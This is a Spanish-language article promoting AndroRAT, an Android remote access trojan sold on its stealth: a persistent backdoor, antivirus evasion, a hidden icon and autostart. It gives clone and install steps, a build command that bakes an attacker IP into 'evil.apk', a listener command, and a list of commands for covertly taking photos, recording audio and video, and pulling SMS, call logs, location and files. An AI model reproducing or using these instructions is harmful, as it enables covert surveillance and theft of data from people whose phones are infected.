AndroRAT es una herramienta diseñada para dar el control del sistema Android de forma remota y recuperar información del mismo. Androrat es una aplicación cliente/servidor desarrollada en Java Android para el lado del cliente y el servidor está en Python.
Características de AndroRAT
- Una puerta trasera completamente persistente
- Totalmente indetectable por cualquier escáner antivirus (VirusTotal)
- Icono invisible en la instalación
- El apk de peso ligero que funciona 24*7 en segundo plano
- La aplicación se inicia automáticamente al arrancar
- Puede grabar audio, video, tomar fotos de ambas cámaras
- Examinar los registros de llamadas y los registros de SMS
- Obtener la ubicación actual, detalles de la tarjeta sim, IP, dirección MAC del dispositivo
Requisitos previos
AndroRAT requiere Python (> 3.6) y JAVA 8 (o Android Studio)
Instalación
git clone https://github.com/karma9874/AndroRAT.git
pip install colorama
Al clonar el repositorio usando Git bash en windows, puedes obtener el siguiente error:
error: unable to create file : Filename too long
Esto se debe a que el Git tiene un límite de 4096 caracteres para un nombre de archivo, excepto en Windows cuando el Git se compila con msys. Utiliza una versión más antigua del API de Windows y hay un límite de 260 caracteres para un nombre de archivo.
Puedes evitarlo estableciendo core.longpaths
como true
.
git config --system core.longpaths true
Debes ejecutar Git bash con privilegios de administrador.
Uso (Windows y Linux)
Modos Disponibles
--build
– para la construcción de android apk--shell
– obteniendo un shell interactivo del dispositivo
Usage:
python androRAT.py --build [flags]
Flags:
-i, --ip Attacker IP address (required)
-p, --port Attacker port number (required)
-o, --output Name for the apk file (optional)
O puedes construir manualmente el apk importando la carpeta Android Code Android Studio y cambiando la dirección IP y el número de puerto en el archivo config.java y luego puedes generar el apk firmado desde Android Studio -> Build -> Generate Signed APK(s)
Modo shell
Usage:
python androRAT.py --shell [flags]
Flags:
-i, --ip Listner IP address
-p, --port Listner port number
Después de ejecutar el modo shell
, obtendrás un intérprete del dispositivo
Comandos que pueden funcionar con el intérprete
deviceInfo --> returns basic info of the device
camList --> returns cameraID
takepic [cameraID] --> Takes picture from camera
startVideo [cameraID] --> starts recording the video
stopVideo --> stop recording the video and return the video file
startAudio --> starts recording the audio
stopAudio --> stop recording the audio
getSMS [inbox|sent] --> returns inbox sms or sent sms in a file
getCallLogs --> returns call logs in a file
shell --> starts a sh shell of the device
vibrate [number_of_times] --> vibrate the device number of time
getLocation --> return the current location of the device
getIP --> returns the ip of the device
getSimDetails --> returns the details of all sim of the device
clear --> clears the screen
getClipData --> return the current saved text from the clipboard
getMACAddress --> returns the mac address of the device
exit --> exit the interpreter
En la Shell Sh hay algunos sub-comandos
get [full_file_path] --> donwloads the file
Ejemplos
- Para construir el apk:
python androRAT.py --build -i 192.169.x.x -p 8000 -o evil.apk
- Para conseguir el intérprete:
python androRAT.py --shell -i 0.0.0.0 -p 8000
Ejemplos del Intérprete
Generando el APK:
Algunos comandos del intérprete:
AndroRAT (este enlace se abre en una nueva ventana) por karma9874 (este enlace se abre en una nueva ventana)
A Simple android remote administration tool using sockets. It uses java on the client side and python on the server side